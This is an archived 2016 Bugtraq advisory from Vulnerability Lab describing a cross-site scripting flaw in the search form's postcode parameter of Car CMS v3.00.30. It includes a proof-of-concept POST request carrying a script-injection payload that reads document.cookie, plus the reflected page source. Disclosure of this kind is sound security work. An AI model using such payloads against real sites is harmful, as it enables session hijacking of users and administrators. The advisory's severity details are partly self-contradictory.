lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 2 Aug 2016 11:02:31 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability

Document Title:
===============
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1891


Release Date:
=============
2016-08-01


Vulnerability Laboratory ID (VL-ID):
====================================
1891


Common Vulnerability Scoring System:
====================================
3.2


Product & Service Introduction:
===============================
Car Portal is a php software product for running auto classifieds websites. It provides functionality 
for the private sellers to sign up, list their car for sale and make changes in their ads online using 
the private sellers administration space. The product provides special functionality for the dealers 
to work and manage multiple ads. An affiliate functionality is also included, affiliate partners may 
sign up and earn commissions on all the sales done through their links. The product comes with a 
powerful admin panel for the administrators, allowing them not only to manage the cars portal settings, 
the dealers, affiliates etc. but also providing full control over the website, its structure and content, 
also statistics, search engines functionality and others.
 
(Copy of the Vendor Homepage: http://www.dream-autos.com/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side post inject cross site scripting web vulnerability in the Car v3.00.30 content management system.


Vulnerability Disclosure Timeline:
==================================
2016-08-01:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Car v3.00.30 content management system.
The vulnerability allows remote attacker to inject own malicious script codes on the client-side of the vulnerable module or service.

A client-side cross site scripting web vulnerability is located in the search engine. The web vulnerability could allow an attacker 
to execute javascript in the web-browser of the user or administrator to compromise session credentials. The attacker can connect 
to a third account to trigger the issue without knowing the password.

The security risk of the client-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. 
Exploitation of the persistent web vulnerability requires a low privileged account with restricted access and without user interaction. 
Successful exploitation of the vulnerabilities results in non-persistent phishing mails, session hijacking, non-persistent external 
redirect to malicious sources and client-side manipulation of affected or connected module context.

Request Method(s):
			[+] POST


Vulnerable Module(s):
			[+] Add (Input)


Vulnerable Parameter(s):
			[+] postcode


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [POST] ---
Host: autoscript.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://autoscript.localhost:8000/
Cookie: PHPSESSID=54e7c1c6d7b68bc40da90f597151654a
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
block_search=search&brand_id=any&autos_model_name=&category_id_arr%5B%5D=any
&autos_price-gte=&autos_price-lte=&post_code='"/>></script><script>alert(document.cookie)</script>


PoC: Source
<div class="form-group">
     <label for="post_code_advance_box">Postcode</label>
<input type="text" name="post_code" id="post_code_advance_box" 
placeholder="Enter Post Code" value="'"/>>ZwX</script><script>alert(document.cookie)</script>" class="form-control">
</div>


Reference(s):
http://autoscript.localhost:8000/


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the car cms web-application search is estimated as medium. (CVSS 3.2)


Credits & Authors:
==================
ZwX -  [http://www.vulnerability-lab.com/show.php?user=ZwX]




Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 				- admin@...lution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@...nerability-lab.com) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ